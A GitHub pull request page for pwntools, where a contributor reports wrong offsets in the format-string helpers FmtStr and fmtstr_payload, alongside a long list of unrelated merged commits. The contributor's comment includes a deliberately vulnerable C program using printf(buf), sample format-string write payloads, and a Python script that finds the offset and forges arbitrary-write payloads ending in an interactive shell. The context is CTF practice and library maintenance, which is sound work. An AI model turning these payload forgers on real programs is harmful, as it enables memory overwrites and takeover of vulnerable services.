Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Incorrect/weird offsets with Fmtstr()/fmtstr_payload() #2532

Closed
wants to merge 68 commits into from

Conversation

big-green-lemon
Copy link

This is a series of commits in an attempt to fix the weirdness of the offsets calculated by the class FmtStr and the function fmtstr_payload().

Could never use pwntools in CTF challenges involving format string attacks for unknown reasons.
Turns out after some testing and coding my own functions that the offsets are off.

I have tested the patched code on some Root Me challenges. No matter the write mode I use between byte, short, int, etc. or other classes I use like DynELF, code seems to be running fine.
I would like to hear your input on it.

Tested and patched version : 4.14.0

peace-maker and others added 30 commits August 12, 2024 19:45
* Cache output of `asm()`

To speed up repeated runs of an exploit, cache the assembled output.

Use a sha1 hash of the shellcode as well as relevant context values
like `context.arch` and `context.bits` to see if the exact same
shellcode was assembled for the same context before.

Fixes Gallopsled#2312

* Return path to cache file if `not extract`

* Update CHANGELOG

* Create temporary copy of cached file

* Add debug log about using the cache

* Include full assembler and linker commandlines in hash

This should catch any changes across pwntools updates and system environment changes.

* Include pwntools version in hash
* Add ELF.close() to release resources

`ELFFile.close()` just closes the mmap'd file, but our own wrapper keeps the file handle open.

This is annoying when using a temporary file on Windows since they can't be deleted if there is
a dangling handle. This can be used together with the inherited context manager from ELFFile.

* Update CHANGELOG
* properly close spawned kitty window

* python2 support

* changelog
…psled#2413)

* Add `hash_type` for `search_by_symbol_offsets`

* Add docs

* Update CHANGELOG

* Allow search `id` in search_by_hash

* Fix py2.7 test

* Rename `hash_type` to `search_type`

* Rename `TYPES['id']` to `TYPES['libs_id']`

* Rename part `hex_encoded_id` to `search_target`

* Turbofast extract build id

* Fix docs

* Add a map for types key

* Extract proper buildid

* Fix docs

* Fix E0606

* Simplify get `mapped_type`

* Add `search_by_libs_id` to `__all__`

* Modify docs

* Fix py2.7

* Fix reference

---------

Co-authored-by: peace-maker <[email protected]>
The upload-artifact action v4.4.0 excluded hidden files from uploads by default. We want to upload only hidden `.coverage*` files though. Enable hidden files again using the `include-hidden-files` input.

https://github.com/actions/upload-artifact/releases/tag/v4.4.0
* Fix returning wrong pid in WSL for run_in_new_terminal

We run cmd.exe which and other Windows processes before going back into WSL. The returned pid would be the one for the ephemeral cmd.exe process instead of the real command we wanted to launch.

I don't know how to properly trace the execution and get the command pid, so scan for newer pids matching the command for a while instead as a workaround.

We wrap the command in a script so psutil.Process.exe() returns the path to the shell instead of the real command. Look at psutil.Process.cmdline() too which contains the real program running right now.

* Make `proc.wait_for_debugger` return the debugger pid

If we fail to get the pid when launching gdb, grab it after tracing the debugger at least. gdb won't be closed when the exploit exits but at least we have the correct pid.

* Fix working directory of run_in_new_terminal in WSL

The process' cwd would be %WINDIR% due to cmd.exe not supporting WSL paths.

* Update CHANGELOG
* feat: extract libraries from Docker image

* docs: update CHANGELOG.md

* fix: python2.7 compatibility

* address comments

* address linter
* Stop using cmd.exe to keep current directory

* Update misc.py

* Update misc.py, deal with cmd.exe

* Update misc.py
…e `ELF` already (Gallopsled#2483)

* Only print `checksec` output of `ELF.libc` when it was printed for the `ELF` already

* Update CHANGELOG
…n `remote` (Gallopsled#2482)

* Throw error when using `sni` and setting `server_hostname` manually in `remote`

Prevents silently replacing the `server_hostname` that was provided in `ssl_args`.

Fixes Gallopsled#2425

* Update CHANGELOG
…er for download libc-database (Gallopsled#2478)

* Add `return_raw` for `search_by_symbol_offsets`

* Add `--offline-only` and unstrip libc as default behavior

* Add short arg name for `--download-libc`

* Fix bugs

* Add fetch parser

* Fix bugs

* file parse not unstrip default

* Update function docs

* Update CHANGELOG

* Edit dest of `--no-strip`

* Update CHANGELOG

* Unstrip before `return cache`

* Revert `--unstrip` help

* Improve `libcdb fetch` default behavior

* Perf fetch command

* Fix fetch command `-u`

---------

Co-authored-by: peace-maker <[email protected]>
* Allow to disable caching

By setting `context.cache_dir = None`. Generate default cache dir again by setting `context.cache_dir = True`.

* Disable cache in `asm` caching test

* Update CHANGELOG

* Fix asm cache test
…)` (Gallopsled#2291)

* Patch for #issues/2290

* Return listening process on `pidof(("0.0.0.0", 1234))`

Instead of returning the process which is connected to port 1234,
return the process which is listening on that port.

* Update CHANGELOG

---------

Co-authored-by: Peace-Maker <[email protected]>
* Add `tube.upload_manually`

Upload data in chunks when having a tube connected to a shell.
This is useful when doing kernel or qemu challenges where you can't use the ssh tube's file upload features.

* Add tests and fix corner cases

* Update CHANGELOG

* Fix character escaping in tests

* Fix gzip compression on Python 2
* Update fmtstr.py documentation

Clarified that the `value` in the `writes` dict (for `fmtstr_payload()`) should be a bytestring if the value to be written is shorter than a long

* Update fmtstr.py documentation for FmtStr class

Updated example and definition for `write()` function in `FmtStr` class to include bytes as the value.

* Fix code formatting

---------

Co-authored-by: Peace-Maker <[email protected]>
* Fix sphinx warnings in docstrings

* Update sphinx for Python 3.13 support

Could not import extension sphinx.builders.epub3 (exception: No module named 'imghdr')

`imghdr` was removed in Python 3.13.
* Drop Python 2.7 support / Require Python 3.10

Only test on Python 3 and bump minimal required python version to 3.10.

* Update CHANGELOG

* Allow to install on Python 3.4

* State intend to not artifially raise the required Python version
@peace-maker
Copy link
Member

Thank you! Can you add more details on how you used the format string functions, what you expected to happen and what actually happened instead? A full reproduction test case with exploit and binary to exploit would be awesome! I've been using this module successfully for a lot of challenges and don't understand what went wrong for you. @Arusekk has more insight into this part of the code.

peace-maker and others added 4 commits January 26, 2025 23:47
…e tool (Gallopsled#2530)

I often use `checksec *` to lazily avoid typing filenames in a directory.
If the directory contains any other sub-dirs, the command fails.
With this patch, checksec will silently skip dir paths. There's still
TOCTOU issue but I don't think checksec do anything important enough
to explicitly use try/catch to account for that.

Co-authored-by: peace-maker <[email protected]>
@big-green-lemon
Copy link
Author

big-green-lemon commented Jan 26, 2025

Hi,

Sorry for the binary part, I ran all my tests on remote challenges. However, I still have their outputs. I hope it will help you investigate theses issues nonetheless.

In this example, consider we want to set 0xdeadbeef at the address 0xbffff95c.

The following code will output the payload for pwntools.

fmtstr_payload(offset, { 0xbffff95c: 0xdeadbeef }, write_mode='short')

Before patching

pwntools Custom functions
Offset 5 268
Search aaaabaaacaaadaaaeaaaSTART%5$pEND %268$x.AAAAAAAAAAAAAAAAAAAAABBBB
Pwntools : b'%48879c%12$hn%8126c%13$hnaaa\\\xf9\xff\xbf^\xf9\xff\xbf'
Custom   : b'%48879x%268$hn%8126x%269$hnA\\\xf9\xff\xbf^\xf9\xff\xbf'

You can clearly see that the offset from pwntools does not make any sense whatsoever, since the address is appended at the end of the payload by fmtstr_payload(), whereas it was prepended at the search pattern.

One way to fix this problem is to prepend the address in the function. But null bytes will mess up the whole process. So instead, let's append the addresses from the very beginning.

Also, I did not bother optimizing my search pattern, which is why the offset is off by 3 (268 instead of 265, as mentionned below). It would have been equal to the later if I shrinked the payload length to 16.

After patching

pwntools Custom functions
Offset 265 268
Search START%5$pENDaaaabaaacaaadaaaeaaa %268$x.AAAAAAAAAAAAAAAAAAAAABBBB
Pwntools : b'%48879c%268$hn%8126c%269$hna\\\xf9\xff\xbf^\xf9\xff\xbf'
Custom   : b'%48879x%268$hn%8126x%269$hnA\\\xf9\xff\xbf^\xf9\xff\xbf'

Both payloads work fine !
The patched code even shifted the offset since the format string payload went longer.

Testing

As for the testing part, I can't think of a practical way for you to test my code.
I can share my code that was used to generate payloads. But that will be all in my opinion.

Procedure

#include <stdio.h>

int value = 0x41414141;

int main() {
  char buf[1024];
  read(0, buf, 1023);
  printf(buf);
  printf("Value = %d\n", value);
  return 0;
}

Compile it with PIE, SF and ASLR disabled (either in 32 or 64 bits).

Trying the leaking function as below should output the ELF magic number :

fmt = FmtStr(...)
fmt.leaker.s(0x08048000) # Or 0x400000
# Should output "\x7fELF\x01..."

Should be able to overwrite value (finding its address is no problem since it's in the .data/.bss section) :

r = process(...)
fmt = FmtStr(...)
p = fmtstr_payload(f.offset, { address_value: 0xdeadbeef }, write_size='short')
r.sendline(p)
res = r.recvall()
# Value should have been changed into 0xdeadbeef

Code

As for my code, here it is :

# b'%48879x%268$hn%8126x%269$hnA\\\xf9\xff\xbf^\xf9\xff\xbf'
#  |----------------------------|
# Length of the format string (aligned) before adding addresses.
# In this particular payload, 28 bytes. Hence its value.
PAYLOAD_LENGTH = 28
PADDING = b''

def execute_fmtstr(r: remote, payload: bytes) -> bytes:
    # The function where you execute the payload.
    # Returns the response of the format string, especially the leak part if it can be found.
    raise NotImplementedError()

def forge_write_payload(offset: int, value: int, address: int):
    lsb = (value & 0xffff)
    msb = (value >> 16) & 0xffff
    payload = PADDING
    if msb > lsb:
        # 2nd part of address
        payload += '%{}x%{}$hn'.format(lsb - len(PADDING), offset).encode()
        # 1st part of address
        payload += '%{}x%{}$hn'.format(msb - lsb, offset + 1).encode()
    elif msb < lsb:
        # 2nd part of address
        payload += '%{}x%{}$hn'.format(msb - len(PADDING), offset + 1).encode()
        # 1st part of address
        payload += '%{}x%{}$hn'.format(lsb - msb, offset).encode()
    else:
        raise ValueError('Equal parts, cannot craft payload.')
    payload = payload.ljust(PAYLOAD_LENGTH, b'A')
    payload += p32(address) + p32(address + 2)
    return payload

def forge_payload(offset: int, format: str, address: int):
    payload = (PADDING + '%{}${}.'.format(offset, format).encode()).ljust(PAYLOAD_LENGTH, b'A') + p32(address)
    return payload

def find_offset(r: remote, start: int, stop: int):
    # Should have used De Bruijn sequence here
    # but I was tweaking by hand until I got the leak right
    for i in range(start, stop + 1):
        haystack = 0x42424242
        leak = execute_fmtstr(r, forge_payload(i, 'x', haystack))
        leak = int(leak, 16)
        if leak == haystack:
            return i

This is how I use my code :

r = remote(...)
offset = find_offset(1, 300)
payload = forge_write_payload(
    offset,
    value=0xdeadbeef,
    address=0xbffff95c
)
r.sendline(payload)

[...]

# Shell
r.interactive()

@big-green-lemon
Copy link
Author

Come to think of it, this PR also mentions and (try to) fixes #2130. See commit 74cb99f.

big-green-lemon and others added 14 commits January 27, 2025 13:22
…allopsled#2504)

* doc: add example case for `tuple`

* update changelog

* doc: fix typos and test errors

* gdb: complete attach doc

* gdb: sleep in doc test to pass test

---------

Co-authored-by: peace-maker <[email protected]>
* ROP: fix `self.leave is None` in some libc

When `pop rbp; pop rsp; ret;` exists in libc, it is chosen instead of
`leave`. Add a specific `order` to filter out the former one.

* add changelog for Gallopsled#2506

* ROP: add sp_move when `pop rsp`

* CHANGELOG: mv Gallopsled#2506 to `5.0.0`
Co-authored-by: Peace-Maker <[email protected]>
Pip doesn't have a RECORD file anymore and fails to uninstall / upgrade
on latest Ubuntu now. --force-reinstall on pwntools causes pip to
upgrade too since it's in our dependencies, which fails too.
As a workaround uninstall pwntools manually before upgrading.
Arusekk added a commit to Arusekk/pwntools that referenced this pull request Feb 28, 2025
And also reduce payload lengths to minimum.

Closes Gallopsled#2130
Closes Gallopsled#2532
Arusekk added a commit to Arusekk/pwntools that referenced this pull request Mar 1, 2025
And also reduce payload lengths to minimum.

Closes Gallopsled#2077
Closes Gallopsled#2130
Closes Gallopsled#2532
@Arusekk
Copy link
Member

Arusekk commented Mar 1, 2025

Hi, thanks a lot for contributing.
After considering your solution I think it is reasonable to limit payload length to absolute minimum (constrained challenges etc).

However, your assumptions are wrong: small offset does not 'make no sense'. Pwntools detected that the payload string (its start) is present at offset 5. It might be present at offset 265 as well, but that does not make offset 5 an invalid candidate by itself. If the payload at offset 5 is truncated (as I assume), you should still start looking for the beginning of the payload, but with a higher starting offset. This means for off in range(1, 1000) should become for off in range(7, 1000) or something. Maybe this should be configurable, but I do not think so. But you can still specify offset and padlen manually. This is the least daunting part of crafting format string payloads in my experience.

I have submitted a PR promoting the index error to a clearer message describing the user's fault. Also, another solution to some of the problems is possible, using the new no_dollars feature.

@Arusekk Arusekk closed this in #2557 Mar 1, 2025
@Arusekk Arusekk closed this in 8867247 Mar 1, 2025
@big-green-lemon
Copy link
Author

big-green-lemon commented Mar 1, 2025 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.